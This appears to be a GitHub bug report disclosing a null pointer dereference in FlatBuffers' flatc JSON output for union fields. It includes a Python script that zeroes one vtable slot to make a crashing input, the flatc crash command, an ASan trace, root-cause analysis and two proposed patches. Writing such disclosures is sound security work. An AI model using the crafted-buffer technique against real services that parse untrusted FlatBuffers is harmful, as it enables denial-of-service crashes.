Null Pointer Dereference in JsonPrinter::PrintOffset() for Union Types #9033

@emptyiscolor

Note: This report was discovered through fuzzing and reproduced and polished by AI for clarity.

Field              Value
CWE                CWE-476 (NULL Pointer Dereference)
Affected file      src/idl_gen_text.cpp, lines 187-188
Tested on          commit e223d69b (flatc version 25.12.19)
Reproducible with  Stock flatc binary (release build)

Description

JsonPrinter::PrintOffset() handles BASE_TYPE_UNION fields by
dereferencing prev_val — a pointer to the union type discriminator byte
in the serialised table. The only guard is FLATBUFFERS_ASSERT(prev_val),
which is removed in release builds (-DNDEBUG).

When a malformed FlatBuffer has the union value field present but the
union type discriminator field absent (vtable offset zeroed), prev_val
is nullptr. Dereferencing it causes an immediate segmentation fault,
crashing flatc or any application that converts a FlatBuffer to JSON.
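
To make the mechanism concrete, here is a minimal Python model of the vtable lookup. It assumes the standard FlatBuffers table layout: a 32-bit root offset, a signed 32-bit offset from the table back to its vtable, and 16-bit vtable slots starting at byte 4 of the vtable. The helper names field_pos() and build_demo() and the hand-built 24-byte buffer are illustrative only; they are not flatc output or FlatBuffers library code. A zero slot maps to None, which plays the role of the null prev_val:

```python
import struct


def field_pos(buf, table_pos, field_index):
    """Return the absolute position of a field, or None if the vtable marks it absent."""
    soffset = struct.unpack_from("<i", buf, table_pos)[0]
    vtable_pos = table_pos - soffset
    vtable_size = struct.unpack_from("<H", buf, vtable_pos)[0]
    slot = 4 + 2 * field_index            # skip vtable size and table size
    if slot + 2 > vtable_size:
        return None                       # field not covered by this vtable
    rel = struct.unpack_from("<H", buf, vtable_pos + slot)[0]
    return table_pos + rel if rel else None   # 0 means "field absent"


def build_demo():
    """Hand-built buffer: root offset, vtable at 4, table at 12 (hypothetical layout)."""
    buf = bytearray(24)
    struct.pack_into("<I", buf, 0, 12)              # root table position
    struct.pack_into("<HHHH", buf, 4, 8, 12, 8, 4)  # vtable: size, table size, u_type, u
    struct.pack_into("<i", buf, 12, 8)              # table -> vtable (12 - 4)
    struct.pack_into("<I", buf, 16, 0)              # u: placeholder offset value
    buf[20] = 1                                     # u_type discriminator
    return buf


buf = build_demo()
root = struct.unpack_from("<I", buf, 0)[0]
u_type_before = field_pos(buf, root, 0)

struct.pack_into("<H", buf, 4 + 4, 0)   # zero the u_type slot, as the report describes
u_type_after = field_pos(buf, root, 0)  # None: the analogue of prev_val == nullptr
u_after = field_pos(buf, root, 1)       # the union value is still present

print(u_type_before, u_type_after, u_after)
```

In the C++ code the absent field is a null pointer rather than None, so the unguarded dereference is a crash instead of a catchable error.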

Affected source (src/idl_gen_text.cpp:184-188)

case BASE_TYPE_UNION: {
    // If this assert hits, you have an corrupt buffer, a union type field
    // was not present or was out of range.
    FLATBUFFERS_ASSERT(prev_val);        // gone in release builds
    auto union_type_byte = *prev_val;    // NULL DEREF

The comment on lines 185-186 acknowledges the corrupt-buffer scenario but
relies solely on an assert that does not survive release compilation.

Confirmed Call Chain

Crash observed in the stock flatc binary with this exact stack trace:

main
  flatbuffers::FlatCompiler::Compile()
    flatbuffers::TextCodeGenerator::GenerateCode()        [idl_gen_text.cpp]
      flatbuffers::GenTextFile()                          [idl_gen_text.cpp:438]
        flatbuffers::GenText()                            [idl_gen_text.cpp:419]
          flatbuffers::GenerateTextImpl()                 [idl_gen_text.cpp:383]
            flatbuffers::JsonPrinter::GenStruct()         [idl_gen_text.cpp:315]
              flatbuffers::JsonPrinter::GenFieldOffset()  [idl_gen_text.cpp:282]
                flatbuffers::JsonPrinter::PrintOffset()   [idl_gen_text.cpp:188]
                  *prev_val → SIGSEGV (address 0x0)

GenText() does not call Verifier before traversing the buffer.
The public APIs GenTextFromTable() and GenTextFile() are equally affected.

Step-by-Step Reproduction (using flatc binary)

This crash is reproducible with the stock flatc binary and a 40-byte
crafted file. No custom C++ compilation required.

Prerequisites

git clone https://github.com/google/flatbuffers.git
cd flatbuffers
git checkout e223d69b          # or any recent commit
cmake -S . -B build -DFLATBUFFERS_BUILD_FLATC=ON -DCMAKE_BUILD_TYPE=Release
cmake --build build --target flatc

Step 1 — Create a schema with a union field

Save as union_crash.fbs:

table Inner { x: int; }
union MyUnion { Inner }
table Root { u: MyUnion; }
root_type Root;

Step 2 — Generate a valid binary FlatBuffer

Save as valid.json:

{ "u_type": "Inner", "u": { "x": 42 } }

Compile to binary:

build/flatc -b union_crash.fbs valid.json
# produces valid.bin (40 bytes)

Step 3 — Corrupt the vtable (2-byte edit)

The corruption zeroes the vtable entry for the u_type field, making it
appear absent while the union value u is still present.

Save as corrupt.py:

#!/usr/bin/env python3
import struct

with open("valid.bin", "rb") as f:
    buf = bytearray(f.read())

# Follow root offset → root table → vtable
root_pos = struct.unpack_from("<I", buf, 0)[0]
vtable_soffset = struct.unpack_from("<i", buf, root_pos)[0]
vtable_pos = root_pos - vtable_soffset

# Zero out field 0 (u_type) at vtable + 4
struct.pack_into("<H", buf, vtable_pos + 4, 0)

with open("corrupt.bin", "wb") as f:
    f.write(buf)

print(f"Wrote corrupt.bin ({len(buf)} bytes, vtable u_type field zeroed)")

Run it:

python3 corrupt.py
# Wrote corrupt.bin (40 bytes, vtable u_type field zeroed)
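
As an optional sanity check, the following sketch confirms that a corruption of this kind touches only the u_type vtable slot. It runs on a small hand-built buffer so that it is self-contained; the helper names changed_offsets() and u_type_slot() and the demo layout are assumptions made for illustration, not part of the attached files:

```python
import struct


def changed_offsets(before, after):
    """Return the byte offsets at which two equal-length buffers differ."""
    if len(before) != len(after):
        raise ValueError("buffers differ in length")
    return [i for i, (x, y) in enumerate(zip(before, after)) if x != y]


def u_type_slot(buf):
    """Position of the vtable slot for field 0 of the root table."""
    root_pos = struct.unpack_from("<I", buf, 0)[0]
    vtable_pos = root_pos - struct.unpack_from("<i", buf, root_pos)[0]
    return vtable_pos + 4


# Hypothetical 24-byte buffer: root offset, vtable at 4, table at 12.
before = bytearray(24)
struct.pack_into("<I", before, 0, 12)
struct.pack_into("<HHHH", before, 4, 8, 12, 8, 4)
struct.pack_into("<i", before, 12, 8)
before[20] = 1

# Apply the same 2-byte edit that corrupt.py performs.
after = bytearray(before)
slot = u_type_slot(after)
struct.pack_into("<H", after, slot, 0)

changed = changed_offsets(before, after)
only_slot_touched = set(changed) <= {slot, slot + 1}
print(changed, only_slot_touched)
```

To run the same check on the real files, read valid.bin and corrupt.bin as bytes and pass them to changed_offsets() in place of the demo buffers. Fewer than two offsets may be reported when one byte of the slot was already zero.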

Step 4 — Crash flatc

build/flatc --json --raw-binary union_crash.fbs -- corrupt.bin

Expected result

flatc crashes immediately with a segmentation fault. A build instrumented
with AddressSanitizer reports:

==PID==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000
    #0 flatbuffers::JsonPrinter::PrintOffset(...)       idl_gen_text.cpp:188
    #1 flatbuffers::JsonPrinter::GenFieldOffset(...)     idl_gen_text.cpp
    #2 flatbuffers::JsonPrinter::GenStruct(...)          idl_gen_text.cpp
    #3 flatbuffers::GenerateTextImpl(...)                idl_gen_text.cpp
    #4 flatbuffers::GenTextFile(...)                     idl_gen_text.cpp
    #5 flatbuffers::TextCodeGenerator::GenerateCode(...) idl_gen_text.cpp
    #6 flatbuffers::FlatCompiler::Compile(...)
    #7 main

Without ASan, flatc simply receives SIGSEGV (signal 11) and is killed
by the OS.

Root Cause Analysis

The bug arises from the interaction of three design decisions:

  1. GenText() does not verify buffers before traversal. It walks the
    table structure assuming well-formedness.

  2. Union fields depend on a type discriminator in the preceding vtable
    slot. If the value field is present but the type field is absent, the
    code has no discriminator to look up.

  3. The null check uses FLATBUFFERS_ASSERT (assert() by default), which
    is stripped in release builds. The code comment on lines 185-186
    explicitly describes the corrupt-buffer scenario but relies on a
    debug-only guard.
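
The third point can be illustrated by analogy in Python, whose compile() built-in accepts an optimize argument that removes assert statements in much the same way NDEBUG removes assert() in C++. This is only an analogy: the function read_discriminator() is hypothetical, and in C++ the unguarded access is a null dereference rather than a catchable TypeError.

```python
GUARDED = '''
def read_discriminator(prev_val):
    assert prev_val is not None, "union type field missing"
    return prev_val[0]
'''


def load(optimize):
    """Compile the guarded function with asserts kept (0) or stripped (1)."""
    namespace = {}
    exec(compile(GUARDED, "<guard>", "exec", optimize=optimize), namespace)
    return namespace["read_discriminator"]


def outcome(fn):
    """Call fn with a missing discriminator and describe what happened."""
    try:
        fn(None)
    except AssertionError:
        return "assert fired"
    except TypeError:
        return "unguarded access"
    return "returned"


debug_fn = load(0)     # comparable to a debug build
release_fn = load(1)   # comparable to a release build with NDEBUG

print(outcome(debug_fn), "/", outcome(release_fn))
```

The guard exists in the source in both cases, but only the debug variant ever executes it.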

Proposed Fix

Option A — Return an error string (minimal, non-breaking)

Replace the assert with a runtime null check using the existing error-return
mechanism (const char* propagated to all callers):

--- a/src/idl_gen_text.cpp
+++ b/src/idl_gen_text.cpp
@@ -183,10 +183,9 @@ const char* PrintOffset(const void* val, const Type& type, int indent,
     switch (type.base_type) {
       case BASE_TYPE_UNION: {
-        // If this assert hits, you have an corrupt buffer, a union type field
-        // was not present or was out of range.
-        FLATBUFFERS_ASSERT(prev_val);
-        auto union_type_byte = *prev_val;  // Always a uint8_t.
+        // Guard against corrupt buffer where union type field is missing.
+        if (!prev_val) return "corrupt buffer: union type field not present";
+        auto union_type_byte = *prev_val;
         if (vector_index >= 0) {
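
The control flow of Option A can be modelled in a few lines of Python. This is a sketch of the error-return pattern only, assuming that a null return means success and a non-null string means failure; print_union() and gen_struct() are hypothetical stand-ins, not the real PrintOffset() or GenStruct():

```python
def print_union(prev_val, out):
    """Return None on success, or an error string if the discriminator is missing."""
    if prev_val is None:
        return "corrupt buffer: union type field not present"
    out.append(f"union type {prev_val[0]}")
    return None


def gen_struct(fields, out):
    """Print each union field, stopping at and propagating the first error."""
    for prev_val in fields:
        err = print_union(prev_val, out)
        if err:
            return err
    return None


ok_out = []
ok_result = gen_struct([b"\x01"], ok_out)

bad_out = []
bad_result = gen_struct([b"\x01", None, b"\x02"], bad_out)

print(ok_result, ok_out)
print(bad_result, bad_out)
```

The caller receives the error string instead of crashing, and fields after the corrupt one are never visited.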

Option B — Verify buffers before text generation

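Add a verification pass at the top of GenText() / GenTextFile() to reject
corrupt buffers before traversal. This would defend against this bug and
other unverified-buffer issues, but it changes the public API contract:
GenText() takes no buffer length, so the size has to come from somewhere.
The sketch below uses parser.builder_.GetSize() as a stand-in and assumes
a schema-driven Verify() entry point on the root struct definition: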

--- a/src/idl_gen_text.cpp
+++ b/src/idl_gen_text.cpp
@@ -418,6 +418,10 @@ const char* GenText(const Parser& parser, const void* flatbuffer,
                     std::string* _text) {
   FLATBUFFERS_ASSERT(parser.root_struct_def_);
+  flatbuffers::Verifier verifier(
+      static_cast<const uint8_t*>(flatbuffer),
+      parser.builder_.GetSize());
+  if (!parser.root_struct_def_->Verify(verifier)) return "buffer verification failed";
   auto root = parser.opts.size_prefixed
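
The kind of pre-flight check Option B implies can be sketched in Python as follows. This is a simplified model, not the FlatBuffers Verifier: it checks only that the root table and its vtable lie inside the buffer and that each union value has its type field. The function check_root_table(), its union_pairs parameter, and the demo buffer are assumptions made for illustration:

```python
import struct


def check_root_table(buf, union_pairs):
    """Return None if the checks pass, else an error string.

    union_pairs lists (type_field_index, value_field_index) for each union field.
    """
    n = len(buf)
    if n < 4:
        return "buffer too small for root offset"
    table_pos = struct.unpack_from("<I", buf, 0)[0]
    if table_pos + 4 > n:
        return "root table out of bounds"
    vtable_pos = table_pos - struct.unpack_from("<i", buf, table_pos)[0]
    if vtable_pos < 0 or vtable_pos + 4 > n:
        return "vtable out of bounds"
    vtable_size, table_size = struct.unpack_from("<HH", buf, vtable_pos)
    if vtable_size < 4 or vtable_pos + vtable_size > n:
        return "vtable size out of bounds"
    if table_pos + table_size > n:
        return "table size out of bounds"

    def present(index):
        slot = 4 + 2 * index
        if slot + 2 > vtable_size:
            return False
        return struct.unpack_from("<H", buf, vtable_pos + slot)[0] != 0

    for type_idx, value_idx in union_pairs:
        if present(value_idx) and not present(type_idx):
            return "union value present without its type field"
    return None


# Hypothetical 24-byte buffer: root offset, vtable at 4, table at 12.
good = bytearray(24)
struct.pack_into("<I", good, 0, 12)
struct.pack_into("<HHHH", good, 4, 8, 12, 8, 4)
struct.pack_into("<i", good, 12, 8)
good[20] = 1

bad = bytearray(good)
struct.pack_into("<H", bad, 8, 0)   # zero the u_type slot

good_result = check_root_table(good, [(0, 1)])
bad_result = check_root_table(bad, [(0, 1)])
print(good_result, "/", bad_result)
```

Note that the check needs the buffer length, which is exactly the information GenText() does not currently receive.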

Included Files

File             Description
reproduce.sh     One-command reproducer: bash reproduce.sh [/path/to/flatc]
corrupt.py       Python script: corrupts valid.bin → corrupt.bin
union_crash.fbs  Schema with union field
valid.json       Valid JSON input
valid.bin        Valid 40-byte binary FlatBuffer (pre-built from schema + JSON)
corrupt.bin      Pre-corrupted binary (vtable u_type zeroed); crashes flatc directly
poc.cpp          Standalone C++ PoC (alternative to the flatc reproduction)

Attachment: report1.zip
